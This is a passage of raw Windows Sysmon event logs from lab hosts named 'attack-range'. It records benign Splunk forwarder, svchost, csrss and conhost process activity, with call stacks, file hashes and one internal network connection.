Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000045978Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:32.528{FE4C2B44-E5F0-63C7-7C06-00000000AF02}60646044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045977Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:32.385{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E5F0-63C7-7C06-00000000AF02}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045976Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:32.385{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045975Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:32.385{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045974Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:32.385{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045973Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:32.385{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045972Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:32.385{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E5F0-63C7-7C06-00000000AF02}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045971Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:32.385{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E5F0-63C7-7C06-00000000AF02}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045970Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:32.385{FE4C2B44-E5F0-63C7-7C06-00000000AF02}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000045969Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:32.353{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB8D8770E690AB0BEAF7473E0A21B517,SHA256=0DF7516511CD79A27D99E740105C5D2A7FB26412A9142AC6128DE6F420FAE340,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045968Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:32.184{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000018331Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:33.911{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2BB58FD0A9A4BFA1D7D551596973D67,SHA256=EE8CA265183CA1E9FF66931E80D0C9F6C9B840D21556F658635722D4E1D1D2DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000018330Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:32.106{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50173-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000045997Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:33.776{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E5F1-63C7-7E06-00000000AF02}2740C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045996Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:33.776{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045995Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:33.776{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045994Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:33.776{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045993Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:33.776{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045992Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:33.776{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E5F1-63C7-7E06-00000000AF02}2740C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045991Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:33.776{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E5F1-63C7-7E06-00000000AF02}2740C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045990Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:33.777{FE4C2B44-E5F1-63C7-7E06-00000000AF02}2740C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000045989Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:33.461{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E11CC7AFEC1C6888F312608D303DE153,SHA256=00D72664DFCA3A32F2AEB6739F65C3A8D805480CE8490DF1BAC681DB9FB363D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018329Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:33.182{E5A8D418-E5F1-63C7-3302-00000000B002}36802196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018328Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:33.035{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E5F1-63C7-3302-00000000B002}3680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018327Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:33.033{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018326Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:33.033{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018325Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:33.033{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018324Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:33.032{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018323Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:33.032{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018322Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 